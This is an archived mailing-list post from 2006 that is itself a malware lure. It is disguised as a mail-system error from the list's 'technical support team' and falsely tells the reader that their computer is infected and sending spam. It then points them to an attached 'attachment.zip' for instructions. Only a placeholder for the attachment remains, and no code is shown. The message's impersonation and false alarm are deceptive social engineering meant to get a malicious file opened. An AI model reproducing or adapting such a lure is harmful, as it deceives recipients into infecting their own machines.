List:       gpsd-users
Subject:    [Gpsd-users] Mail System Error - Returned Mail
From:       "Automatic Email Delivery Software" <MAILER-DAEMON () lists ! berlios ! de>
Date:       2006-09-30 0:55:13

Dear user of lists.berlios.de,

Your e-mail account was used to send a huge amount of unsolicited commercial e-mail \
during the recent week. We suspect that your computer had been infected by a recent \
virus and now contains a trojan proxy server.

We recommend you to follow the instructions in order to keep your computer safe.

Best regards,
lists.berlios.de technical support team.

["attachment.zip" (application/octet-stream)]